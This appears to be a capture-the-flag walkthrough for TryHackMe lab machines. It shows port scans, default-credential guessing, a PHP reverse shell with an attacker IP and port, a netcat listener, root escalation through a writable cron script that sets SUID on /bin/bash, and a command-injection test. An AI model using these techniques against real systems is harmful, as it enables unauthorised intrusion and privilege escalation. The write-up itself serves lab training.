Hacker Of The Hill #1
A HackerOne event. Hack machines and submit flags to get private invitations to bug-bounty programs on HackerOne.
LINK
@official link of the room.
IMP *** NOTE ***
IP of the victim / THM machines can be different in this blog as , i terminated and deployed machine many times.
TASK 1 - INTRODUCTION
Q1) Make an account on HackerOne's CTF platform. [ No Answer Needed ]
Q2) Where else do you need to submit flags to in-order to win prizes and private bug-bounty invites? [ https://***.hacker101.com/ ]
TASK 2 - TUTORIALS & RULES
Q1) & Q2) [ No Answer Needed ]
EASY :- basic_start
{1} NMAP :-
nmap -sVC -v 10.10.228.122>>> nmap -sVC -v 10.10.228.122
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
264/tcp filtered bgmp
8000/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8001/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8002/tcp open http Apache httpd 2.4.29 ((Ubuntu))
9999/tcp open abyss?{2} GOBUSTER - ( PORT 80 )
gobuster dir -x php,txt -w /usr/share/dirb/wordlists/common.txt -t20 -u 10.10.228.122>>> gobuster dir -x php,txt -w /usr/share/dirb/wordlists/common.txt -t20 -u 10.10.228.122
## only interesting result shown below
/index.html (Status: 200)
/server-status (Status: 403)Through Nmap, We found that 4 diff websites running on that victim machine.
Serial Number
PORT number
1
80
2
8000
3
8001
4
8002
On Port 80, the basic linux apache2 server running, and nothing usefull found, then lets move on to 2nd website running at port 8000.
EASY :- port 8000
{1} GOBUSTER
gobuster dir -x php,txt -w /usr/share/dirb/wordlists/common.txt -t20 -u http://10.10.228.122:8000/>>> gobuster dir -x php,txt -w /usr/share/dirb/wordlists/common.txt -t20 -u http://10.10.228.122:8000/
/about (Status: 200)
/contact (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)Ah! We found some accessable documents , lets read them :-
# Contents of robots.txt #
User-agent: *
Disallow: /vbcmsOh! We found a dir name "vbcms" on that website. lets check it out. Oh! It redirect us to login page "/vbcms/login". lets start exploiting it , first lets try to give some basic credentials for logins.
admin:password -> no luck
admin:12345 -> no luck
etc..
# got the access with these:-
ad***:a***n
Since We are Admin, we can change the code of any page easily, lets Edit the "Home Page" and turn it into reverse shell page by replacing the current Home Page Code with Php-reverse-shell.php (by pentestmonkey) .
# Location of reverse_shell on kali
/usr/share/webshells/php/php-reverse-shell.phpNote :- Change the ip addr & port number in php-reverse-shell code, before using it. For better , replace the whole two lines of ip and port variable with :-
$ip = isset($_POST['ip']) ? $_POST['ip'] : '10.17.7.71';
$port = isset($_POST['port']) ? $_POST['port'] : '4444';
# after changing the code of home page
>>> nc -nlvp <port_number>
# write the same port number that is in php-reverse-shell code
>>> nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.17.7.71] from (UNKNOWN) [10.10.251.117] 59144
Linux web-serv 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
11:02:45 up 9 min, 0 users, load average: 0.00, 0.56, 0.56
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
$ pwd
/
$ cd /home
$ ls -la
total 24
drwxr-xr-x 6 root root 4096 Feb 15 02:02 .
drwxr-xr-x 23 root root 4096 Feb 15 01:01 ..
drwxr-xr-x 2 serv1 serv1 4096 Feb 15 02:02 serv1
drwxr-xr-x 2 serv2 serv2 4096 Feb 15 02:02 serv2
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 02:02 serv3
drwxr-xr-x 2 serv4 serv4 4096 Feb 15 19:20 serv4Since We are 'serv1' , we have whole access to serv1's home folder, lets check what's in it.
$ cd serv1
$ ls -la
total 20
drwxr-xr-x 2 serv1 serv1 4096 Feb 15 02:02 .
drwxr-xr-x 6 root root 4096 Feb 15 02:02 ..
lrwxrwxrwx 1 root root 9 Feb 15 00:56 .bash_history -> /dev/null
-rw-r--r-- 1 serv1 serv1 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 serv1 serv1 3771 Apr 4 2018 .bashrc
-rw-r--r-- 1 serv1 serv1 807 Apr 4 2018 .profile!Nothing! Important found. Through the HINT button of serv1 flag on tryhackme, we get the flag location "/usr/games/fortune".
$ cd /usr/games
$ cat fortune
VEh*******ROems****JM01ER****FV6TldZd05qTXlaa*******lets find the way to get either root shell or root privileges. lets browse other users home directory too.
# after a while we get an interesting file in serv3 folder
$ pwd
/home/serv3/backups
$ ls -la
total 16
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 01:02 .
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 02:02 ..
-r-xr-xr-x 1 serv3 serv3 52 Feb 15 01:02 backup.sh
drwxr-xr-x 2 serv3 serv3 4096 Feb 15 01:01 files
# lets also check whats in crontab file :-
$ cat /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /home/serv3/backups/backup.sh
## Wow, the backup.sh is in crontab & running as a root
## if we get write permissions of backup.sh
## then we can get root shell easily.
## but the owner is serv3 means first we have to get serv3 shellThen lets get Serv3 shell , we know that serv1's website running on port 8000 , so the website running on port 8002 might of serv3. Lets exploit the website on port 8002 first.
EASY :- port 8002
We have a 'try free lesson' button on site , lets try that first. Oh! there's a textarea where we can write any php code and the result will be reflected in our browser too.
Ok lets try to paste the php-reverse-shell code ( same that we used to get serv1 shell ).
NOTE :- ' Dont paste <?php & ?> in the textarea as there is already '
lets Start netcat on our kali machine on the port written in reverse_shell code. and then click "check button".
# first lets get serv3 flag then, we will try to get root priv.
# the flag is located at "/var/www/serv4/index.php"
$ pwd
/var/www/serv4
$ cat index.php
THM{****ODZj*****DEwM2F******2RiYz**}
# through this , we can get the same user shell but with no environment restriction
$ python3 -c 'import pty;pty.spawn("/bin/sh")'
$ cd /home/serv3
$ ls -laR
total 24
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 02:02 .
drwxr-xr-x 6 root root 4096 Feb 15 02:02 ..
lrwxrwxrwx 1 root root 9 Feb 15 00:56 .bash_history -> /dev/null
-rw-r--r-- 1 serv3 serv3 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 serv3 serv3 3771 Apr 4 2018 .bashrc
-rw-r--r-- 1 serv3 serv3 807 Apr 4 2018 .profile
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 01:02 backups
./backups:
total 16
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 01:02 .
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 02:02 ..
-r-xr-xr-x 1 serv3 serv3 52 Feb 15 01:02 backup.sh
drwxr-xr-x 2 serv3 serv3 4096 Feb 15 01:01 files
./backups/files:
total 8
drwxr-xr-x 2 serv3 serv3 4096 Feb 15 01:01 .
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 01:02 ..
# we already know that the backup.sh is present in crontab
# and in crontab , backup.sh is running as root.
# and now we are the owner of the backup.sh file , means we get a reverse shell( as a root).
# but first lets get the serv3 flag in "/var/www/serv4/"
$ cat /var/www/serv4/index.php
cat /var/www/serv4/index.php
THM{YmN****jN2******M2F***A5Y2*****h}
# to get the real flag , submit the flag at :- "https://ctf.hacker101.com/ctf/flagcheck":-) Getting Root Privilege
# lets check its(/home/serv3/backups/backup.sh) content first
$ cat backup.sh
#!/bin/bash
mv /backups/* /home/serv3/backups/files
# lets change the content of backup.sh
# but before that we have to change the current permission of backup.sh in order to write content in it.
$ chmod 777 backup.sh
# then, write our 'malicious payload line' to get root privilege.
# we are setting suid bit on '/bin/bash' so that we can run '/bin/bash' as root user
# and we are also copying that /bin/bash to current directory
$ echo "#!/bin/bash
chmod 4777 /bin/bash
cp /bin/bash /home/serv3/backups/bash> "> >backup.sh
$ cat backup.sh
#!/bin/bash
chmod 4777 /bin/bash
cp /bin/bash /home/serv3/backups/bash
$ ls
backup.sh
files
# lets wait a minute to run cron job
# lets check
$ ls -la
total 1104
drwxr-xr-x 3 serv3 serv3 4096 Jul 26 08:09 .
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 02:02 ..
-rwxrwxrwx 1 serv3 serv3 71 Jul 26 08:08 backup.sh
-rwxr-xr-x 1 root root 1113504 Jul 26 08:11 bash
drwxr-xr-x 2 serv3 serv3 4096 Feb 15 01:01 files
# wow, we got bash file here, lets run it and get root privilege
$ bash -p
id
uid=1002(serv3) gid=1002(serv3) euid=0(root) groups=1002(serv3)
# lets read all remaining flags
# serv2 (/var/lib/rary)
$ cat rary
THM{B**_Y****e_G**d_T***_**_***_*_H**h}
# root (/root/root.txt)
$ cat root.txt
THM{OW***GR**WM0******NmM2****NkODg*}
paste these flag on "https://ctf.hacker101.com/ctf/flagcheck" to get real flag 'BACK2THM'MEDIUM :- basic_start
{1} NMAP :-
nmap -sVC -v -Pn 10.10.236.132$ nmap -sVC -v -Pn 10.10.236.132
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-16 04:03:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server?MEDIUM :- port 80
{1} GOBUSTER :-
gobuster dir -x php,txt -w /usr/share/dirb/wordlists/common.txt -t10 -u http://10.10.236.132:80/$ gobuster dir -x php,txt -w /usr/share/dirb/wordlists/common.txt -t10 -u http://10.10.236.132:80/
/dashboard (Status: 302)
/login (Status: 200)
/logout (Status: 302)
/profile (Status: 302)
/signup (Status: 200)
/users (Status: 301)
Lets create an account here ( "test:test" ) :-
We get a dashboard page where we can upload images, lets try to upload a php file and see what happen. error :- "File must end in .jpg". Nope after several tries, nothing can be done here, lets check another thing to exploit.
I found an interesting js file ( after some playing around ) "Inspect Element -> Network Tab -> script.js" , which is responsible for sanitizing username field input . then lets first block it (script.js file) ,
then we can try to exploit the username field on "/profile" webpage. I am trying to test command injection here :-
NOTE :- I am trying command injection these on 'change username input field' which is on -> 'http://<thm-machine-ipaddr>/profile'
So I will try to ping my kali machine through the victim machine and check (on my kali) that the ping command is running successfully or not (means command injection is working or not)
{ON KALI}
sudo tcpdump -i tun0 icmp$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes{ ON WEBSITE }
After clicking "change username" button.
{ ON KALI }
Yay! we recvd ping req that means cmd injection works , then lets insert powershell reverse shell code to get a reverse shell.
NOTE -> "powershell reverse shell becoz , through nmap we came to know it is windows machine, i pasted a line below, from nmap output that will clear that it is a windows machine"
END
Last updated
Was this helpful?